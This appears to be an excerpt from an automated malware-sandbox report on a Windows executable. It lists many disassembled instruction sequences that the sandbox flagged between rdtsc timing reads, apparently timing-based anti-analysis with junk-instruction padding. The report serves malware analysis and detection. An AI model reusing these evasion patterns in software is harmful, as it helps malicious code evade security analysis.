                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855C26 second address: 855C2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DA5 second address: 855DBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FECB125BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FECB125BFCCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DBD second address: 855DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DC3 second address: 855DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DC9 second address: 855DD3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856652 second address: 85667E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECB125BFD0h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FECB125BFD2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85681E second address: 85682F instructions: 0x00000000 rdtsc 0x00000002 je 00007FECB0CC2D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85682F second address: 856833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DA9D second address: 85DAA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FA8D second address: 85FA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FA94 second address: 85FAB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB0CC2D19h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FECB0CC2D11h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAB2 second address: 85FABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FABE second address: 85FAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAC8 second address: 85FAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FECB125BFC8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAD5 second address: 85FAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FECB0CC2D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAE1 second address: 85FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAE5 second address: 85FAF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8625DD second address: 8625E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8625E3 second address: 8625EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8628C6 second address: 8628CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8628CE second address: 8628D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A14 second address: 862A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A18 second address: 862A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A1C second address: 862A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A26 second address: 862A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A36 second address: 862A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866B5C second address: 866B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FECB0CC2D06h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866B69 second address: 866B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866E4E second address: 866E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867114 second address: 86711F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E60F second address: 86E613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E613 second address: 86E623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FECB125BFCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81498F second address: 814994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814994 second address: 8149AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FECB125BFC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnc 00007FECB125BFC6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149AD second address: 8149EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FECB0CC2D0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx ecx, cx 0x00000011 mov ebx, dword ptr [ebp+12485A01h] 0x00000017 add dx, 5900h 0x0000001c add eax, ebx 0x0000001e add di, DBD7h 0x00000023 nop 0x00000024 jmp 00007FECB0CC2D0Dh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149EB second address: 8149EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149EF second address: 8149F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E74B second address: 86E74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E74F second address: 86E753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E753 second address: 86E75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724BD second address: 8724DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FECB0CC2D06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FECB0CC2D10h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724DE second address: 8724E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724E4 second address: 872519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FECB0CC2D17h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FECB0CC2D11h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872519 second address: 87253B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB125BFC6h 0x00000008 jl 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007FECB125BFD2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87253B second address: 872557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FECB0CC2D0Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F48 second address: 871F52 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB125BFC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8779FF second address: 877A1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECB0CC2D06h 0x00000008 jmp 00007FECB0CC2D0Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 je 00007FECB0CC2D06h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877A1D second address: 877A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87822E second address: 878234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878539 second address: 87853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878AD9 second address: 878B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB0CC2D06h 0x00000009 jns 00007FECB0CC2D06h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FECB0CC2D12h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DE7 second address: 878DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DF3 second address: 878DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DF8 second address: 878E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FECB125BFCCh 0x00000016 jp 00007FECB125BFC6h 0x0000001c jno 00007FECB125BFCEh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882D8F second address: 882DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FECB0CC2D11h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882DA5 second address: 882DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F55 second address: 881F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F5D second address: 881F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FECB125BFD7h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FECB125BFCCh 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FECB125BFC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820EE second address: 8820F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8823C0 second address: 8823C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8826A7 second address: 8826CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8826CB second address: 8826F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FECB125BFDDh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FECB125BFD5h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A787 second address: 88A798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A798 second address: 88A7A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888AE5 second address: 888AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888EEE second address: 888EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888EF2 second address: 888F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FECB0CC2D08h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889837 second address: 889858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFCEh 0x00000007 jl 00007FECB125BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FECB125BFC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889F76 second address: 889FA1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB0CC2D1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECB0CC2D0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B0 second address: 8886B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B4 second address: 8886BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886BE second address: 8886C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7D8 second address: 88D7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7DE second address: 88D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB125BFCBh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7F7 second address: 88D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7FB second address: 88D80B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB125BFC6h 0x00000008 jp 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CA7 second address: 894CCE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 jmp 00007FECB0CC2D15h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FECB0CC2D0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894612 second address: 894619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894619 second address: 894629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FECB0CC2D06h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89478F second address: 894795 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894795 second address: 8947DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FECB0CC2D06h 0x0000000d je 00007FECB0CC2D06h 0x00000013 pop edx 0x00000014 jg 00007FECB0CC2D17h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FECB0CC2D0Eh 0x00000022 pushad 0x00000023 jc 00007FECB0CC2D06h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8947DC second address: 8947E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8947E1 second address: 8947E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89493A second address: 894946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007FECB125BFC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894946 second address: 89497B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FECB0CC2D06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FECB0CC2D15h 0x00000013 jmp 00007FECB0CC2D12h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0C12 second address: 8A0C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0C16 second address: 8A0C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D14h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FECB0CC2D22h 0x00000011 jmp 00007FECB0CC2D16h 0x00000016 jns 00007FECB0CC2D06h 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FECB0CC2D0Ah 0x00000023 push edi 0x00000024 jmp 00007FECB0CC2D10h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A78FD second address: 8A7901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7901 second address: 8A7946 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FECB0CC2D19h 0x00000010 jmp 00007FECB0CC2D13h 0x00000015 jmp 00007FECB0CC2D19h 0x0000001a push ecx 0x0000001b jnc 00007FECB0CC2D06h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC289 second address: 8AC295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FECB125BFC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B796A second address: 8B7987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7987 second address: 8B79D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FECB125BFCAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 jmp 00007FECB125BFD4h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007FECB125BFD5h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B79D1 second address: 8B79F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FECB0CC2D0Dh 0x0000000b jmp 00007FECB0CC2D13h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9EED second address: 8B9F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FECB125BFD3h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5BF second address: 8BE5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FECB0CC2D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
